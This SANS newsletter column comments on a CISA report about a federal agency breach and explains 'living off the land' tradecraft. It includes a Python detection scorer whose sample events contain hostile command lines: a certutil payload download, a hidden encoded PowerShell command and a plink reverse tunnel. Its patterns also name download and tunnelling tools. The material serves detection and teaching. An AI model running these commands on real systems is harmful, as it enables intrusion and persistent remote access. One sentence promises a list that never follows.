John Pescatore - SANS Director of Emerging Security Trends
This week’s Drilldown will focus on one item (included below) from NewsBites Issue 76, commenting on a report published by the U.S. Department of Homeland Security (DHS) Cybersecurity & Infrastructure Security Agency (CISA), which describes in detail how a government agency was penetrated and compromised.
To give away the ending: while the attackers used some advanced techniques, they had already obtained privileged administrator credentials. If you give away the combination to the safe, you have pretty much given up the crown jewels.
The attackers also took advantage of other failures of basic security hygiene. Systems weren't patched, and the primary firewall appeared to be running a default-allow ("Allow All") policy.
The advanced techniques are what are being called "living off the land." Essentially, attackers take advantage of operating system services and other tools that system administrators use routinely and that all too often are left enabled on more systems than necessary. Not only are these very powerful services, but by using them attackers don't need to bring in large executables of their own. And while the tools are running, they look like normal sysadmin processes, so detection has to rest on context (who ran the tool, from where, spawned by what, with which arguments) rather than on the binary name.
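As an added example (not from the article or the CISA report), the following Python scorer shows what "looks like a normal sysadmin process" means for detection: the binary alone scores almost nothing, and an alert only fires when it is combined with contextual signals such as an unapproved account, a web-server or office-application parent, or command-line switches (encoded commands, hidden windows, certutil/bitsadmin downloads, ssh/plink tunnels) that interactive administrators rarely use. The Sysmon-like JSON field names, the dual-use binary list, the admin allowlist, the weights and the sample events are all assumptions constructed for this example.

```python
"""
Added example: context-based scoring of Windows process-creation events to
surface living-off-the-land (LOTL) activity. Field names follow a
Sysmon-like JSON shape but are an assumption, not any product's schema.
"""
import json
import re
from typing import Iterable

# Dual-use admin binaries that LOTL tradecraft abuses (assumed, non-exhaustive).
LOTL_IMAGES = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wmic.exe", "certutil.exe",
    "bitsadmin.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
    "wscript.exe", "cscript.exe", "net.exe", "net1.exe", "plink.exe", "ssh.exe",
}

# Parents that should never spawn admin tooling: IIS worker processes and
# office applications are the classic web-shell and phishing footholds.
SUSPICIOUS_PARENTS = {"w3wp.exe", "winword.exe", "excel.exe", "outlook.exe", "mshta.exe"}

# Accounts approved to drive admin tooling (assumed; in practice derive from AD groups).
ADMIN_ALLOWLIST = {"jsmith-adm"}

# (compiled pattern, weight, reason). Weights are a judgment call for this example.
SUSPICIOUS_ARGS = [
    (re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I), 2, "encoded PowerShell command"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-no(?:p|profile)\b", re.I), 1, "profile suppressed"),
    (re.compile(r"\b(?:downloadstring|downloadfile|invoke-webrequest|iwr|wget|curl)\b", re.I), 2, "web download from script"),
    (re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache", re.I), 2, "certutil used as downloader"),
    (re.compile(r"\bbitsadmin(?:\.exe)?\b.*/transfer", re.I), 2, "bitsadmin used as downloader"),
    (re.compile(r"\bnet1?(?:\.exe)?\s+(?:user|localgroup|group)\b.*\s/add\b", re.I), 2, "account or group manipulation"),
    (re.compile(r"\b(?:plink|ssh)(?:\.exe)?\b.*\s-[RD]\s*\d+", re.I), 2, "ssh/plink reverse or SOCKS tunnel"),
]

ALERT_THRESHOLD = 3


def basename(path: str) -> str:
    """Last path component, lower-cased; accepts either slash style."""
    return re.split(r"[\\/]", path)[-1].lower()


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event."""
    score, reasons = 0, []
    image = basename(ev.get("image", ""))
    parent = basename(ev.get("parent_image", ""))
    user = ev.get("user", "")
    cmdline = ev.get("cmdline", "")

    is_lotl = image in LOTL_IMAGES
    if is_lotl:  # the binary itself is only a weak signal
        score += 1
        reasons.append(f"dual-use admin binary {image}")
    for pattern, weight, reason in SUSPICIOUS_ARGS:
        if pattern.search(cmdline):
            score += weight
            reasons.append(reason)
    if parent in SUSPICIOUS_PARENTS:
        score += 2
        reasons.append(f"spawned by {parent}")
    if is_lotl and user not in ADMIN_ALLOWLIST:
        score += 2
        reasons.append(f"account {user} not approved for admin tooling")
    return score, reasons


def scan(lines: Iterable[str]) -> list[dict]:
    """Parse JSON-lines events and return those at or above the alert threshold."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        score, reasons = score_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append({"host": ev.get("host"), "user": ev.get("user"),
                           "image": basename(ev.get("image", "")),
                           "score": score, "reasons": reasons})
    return alerts


# Constructed sample events (not real telemetry). Plain usernames avoid domain
# backslashes; the base64 blob is a constructed placeholder.
SAMPLE_EVENTS = r'''
{"ts": "2020-09-24T08:01:00Z", "host": "srv-file01", "user": "jsmith-adm", "logon_type": 10, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -Command Get-Service"}
{"ts": "2020-09-24T08:02:10Z", "host": "srv-file01", "user": "svc_backup", "logon_type": 3, "parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"ts": "2020-09-24T08:03:05Z", "host": "srv-file01", "user": "jsmith-adm", "logon_type": 10, "parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\certutil.exe", "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\\Users\\Public\\a.exe"}
{"ts": "2020-09-24T08:04:30Z", "host": "web-dmz02", "user": "DefaultAppPool", "logon_type": 5, "parent_image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c whoami /all"}
{"ts": "2020-09-24T08:05:00Z", "host": "wks-041", "user": "alee", "logon_type": 2, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe C:\\Users\\alee\\notes.txt"}
{"ts": "2020-09-24T08:06:45Z", "host": "srv-file01", "user": "svc_backup", "logon_type": 3, "parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Users\\Public\\plink.exe", "cmdline": "plink.exe -N -R 9050:127.0.0.1:9050 ops@203.0.113.10 -pw Summer2020"}
'''.strip().splitlines()


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"{alert['host']} {alert['user']} {alert['image']} score={alert['score']}: "
              + "; ".join(alert['reasons']))
```

Run as a script, it reports four of the six constructed events: the encoded, hidden PowerShell from an unapproved service account, the certutil download (even though an approved admin ran it), the cmd.exe spawned by the IIS worker, and the plink reverse tunnel from the service account. The approved admin's plain Get-Service call and the notepad launch stay below the threshold, which is the point: the same powershell.exe image sits in both the benign and the alerted events.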
In the SANS Top New Attacks and Threat Report published in April 2020, Ed Skoudis described living-off-the-land techniques and listed two key mitigation requirements:
The DHS/CISA report focused mainly on the firewall configuration deficiencies. It recommended standard "deny all except what is required and approved" policies, and also listed two-factor authentication, least privilege, and keeping software up to date.
______________________________________________________________________________
(September 24, 2020)
The U.S. Department of Homeland Security (DHS) Cybersecurity & Infrastructure Security Agency (CISA) has published an analysis report detailing a cyberattack against a federal agency's enterprise network. The threat actor gained access to the unnamed agency's system and exfiltrated data. The report provides information about the methods used to gain access to the network. The breach was detected through EINSTEIN, CISA's intrusion detection system. The threat actor was able to gain persistent network access through reverse Socket Secure (SOCKS) proxies.
[Editor Comments]
[Pescatore] This is the first time I've seen DHS/CISA put out a detailed public report on how an attack against a government agency succeeded. This one starts off with a litany of basic security hygiene failures: the attackers started out with admin credentials; admin accounts didn't seem to require two-factor authentication for remote access; if a firewall was in place, it seemed to have an "allow everything not explicitly denied" policy; VPN patches were not applied; etc. The details on the steps the attackers took show a number of living-off-the-land techniques that Ed Skoudis detailed in his SANS "Most Dangerous New Attacks" keynote panel talk at this year's RSA.
[Neely] This is an excellent write-up of how the system was compromised and how the attacker adjusted to available resources to continue to penetrate and exploit the system. This also reinforces the need for two-factor authentication on internet-accessible services, especially email and remote access (e.g., VPN). Take a look at your network and make sure that not only strong authentication is required, but also that patches are applied.
Read more in:
ZDNet: CISA says a hacker breached a federal agency
www.zdnet.com/article/cisa-says-a-hacker-breached-a-federal-agency/
US-CERT CISA: Analysis Report (AR20-268A) | Federal Agency Compromised by Malicious Cyber Actor
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a